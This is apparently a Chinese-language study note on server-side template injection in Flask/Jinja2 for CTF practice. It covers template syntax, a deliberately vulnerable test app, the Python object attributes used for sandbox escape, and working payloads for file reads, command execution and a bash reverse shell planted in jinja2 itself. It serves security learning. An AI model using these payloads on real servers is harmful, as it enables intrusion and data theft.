模板引擎
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
SSTI(模板注入)
SSTI 就是服务器端模板注入(Server-Side Template Injection)
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
凡是使用模板的地方都可能会出现 SSTI 的问题,SSTI 不属于任何一种语言,沙盒绕过也不是,沙盒绕过只是由于模板引擎发现了很大的安全漏洞,然后模板引擎设计出来的一种防护机制,不允许使用没有定义或者声明的模块,这适用于所有的模板引擎。
Python SSTI
介绍
CTF中经常见到的就是Flask框架,而Flask中默认的模板语言是Jinja2,render_template 函数封装了该模板引擎
模板语法主要分两种变量和结构标签
{{}}表示这是一个变量,可以根据用户在模块端给予的参数的不同,进行调整
{% %}这样代表控制语句
控制语句经常使用的for和if
if
{% if title %}
<title>{{title}} - microblog</title>
{% else %}
<title>Welcome to microblog</title>
{% endif %}
for
{% for user in users %}
<li>{{ user.username|title }}</li>
{% endfor %}
SSTI测试脚本:
from flask import Flask, render_template, render_template_string, request,flash app = Flask(__name__) @app.route('/yunying') def hello(): code = request.args.get('ssti') html = ''' <h2>The ssti is </h2> <h3>%s</h3> ''' % (code) return render_template_string(html) if __name__ == "__main__": app.run()
传入{{3*9}}让模板解析
还可以用Flask中常见的几个全局变量去测试比如config,g,session,request去探测是否存在ssti漏洞
利用
python中一切均为对象,均继承object对象
python的 SSTI大部分是依靠基类->子类->危险函数的方式来利用ssti,以下为一些内置方法
__class__
万物皆对象,而class用于返回该对象所属的类,比如某个字符串,他的对象为字符串对象,而其所属的类为<class 'str'>。
__bases__
以元组的形式返回一个类所直接继承的类
__base__
以字符串返回一个类所直接继承的类
__mro__
返回解析方法调用的顺序
__subclasses__()
获取类的所有子类
__init__
所有自带带类都包含init方法,便于利用他当跳板来调用globals
__globals__
function.__globals__,用于获取function所处空间下可使用的module、方法以及所有变量
总结:
__dict__ :保存类实例或对象实例的属性变量键值对字典 __class__ :返回一个实例所属的类 __mro__ :返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __bases__ :以元组形式返回一个类直接所继承的类(可以理解为直接父类)__base__ :和上面的bases大概相同,都是返回当前类所继承的类,即基类,区别是base返回单个,bases返回是元组 // __base__和__mro__都是用来寻找基类的 __subclasses__ :以列表返回类的子类 __init__ :类的初始化方法 __globals__ :返回函数所在模块命名空间中的所有变量 __getattribute__() :获取属性或方法,对模块和类都有效 __getitem__() :以索引取值或者键取值 __builtin__&&__builtins__ :python中可以直接运行一些函数,例如int(),list()等等。 这些函数可以在__builtin__可以查到。查看的方法是dir(__builtins__) 在py3中__builtin__被换成了builtin 1.在主模块main中,__builtins__是对内建模块__builtin__本身的引用,即__builtins__完全等价于__builtin__。 2.非主模块main中,__builtins__仅是对__builtin__.__dict__的引用,而非__builtin__本身
SSTI中主要的目的:
- 执行命令
- 读取文件内容(flag)
执行shell相关函数
//执行shell的模块 import os, commands, platfrom, subprocess //执行shell的函数 os.system('ls') os.popen('ls').read() platform.popen('ls').read() status,output = commands.getstatusoutput('ls') subprocess.call(['ifconfig'],shell=True)
读文件的话
py2中
file对象或者open函数
py3中
没有file对象,只能用open函数
__class__,class用于返回该对象所属的类
__bases __,以元组的形式返回一个类所直接继承的所有类。
__base __,以字符串返回一个类所直接继承的类
__mro __,返回解析方法调用的顺序
可以看到__bases__返回了test()的两个父类,__base_返回了test()的第一个父类,__mro__按照子类到父类到父类解析的顺序返回所有类(python2和python2有区别)
__subclasses __(),获取类的所有子类
__init __
所有自带带类都包含init方法,便于利用他当跳板来调用globals
__globals __
function.__globals __,用于获取function所处空间下可使用的module、方法以及所有变量
__dict__,保存类实例或对象实例的属性变量键值对字典
__getattribute__(),获取属性或方法,对模块和类都有效
python2利用
就放几个常见的payload理解一下
文件读取和写入
#读文件 {{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} #写文件 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}
任意执行
{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('code')}}
{{ config.from_pyfile('/tmp/owned.cfg') }}
{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('from subprocess import check_output
RUNCMD = check_output
')}}
{{ config.from_pyfile('/tmp/owned.cfg') }}
{{ config['RUNCMD']('/usr/bin/id',shell=True) }}
#假设在/usr/lib/python2.7/dist-packages/jinja2/environment.py, 弹一个shell
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/usr/lib/python2.7/dist-packages/jinja2/environment.py').write("
os.system('bash -i >& /dev/tcp/[IP_ADDR]/[PORT] 0>&1')") }}
无回显
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']('1+1')}}
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').system('whoami')")}}
任意执行只需要一条指令
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}(system函数换为popen('').read(),需要导入os模块)
{{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}(不需要导入os模块,直接从别的模块调用)
#剩下的考完试再写,一个下午基本懂原理和构造方式了,发现有很多文章杂七杂八的,想总结的话比较困难,理解了就会构造了就完事了,其他的就总结下奇怪的姿势就OK了
参考:
https://www.cnblogs.com/-qing-/p/11656544.html
https://blog.csdn.net/weixin_34203426/article/details/86355535
https://www.cnblogs.com/zaqzzz/p/10251892.html
https://blog.csdn.net/qq_40657585/article/details/83657220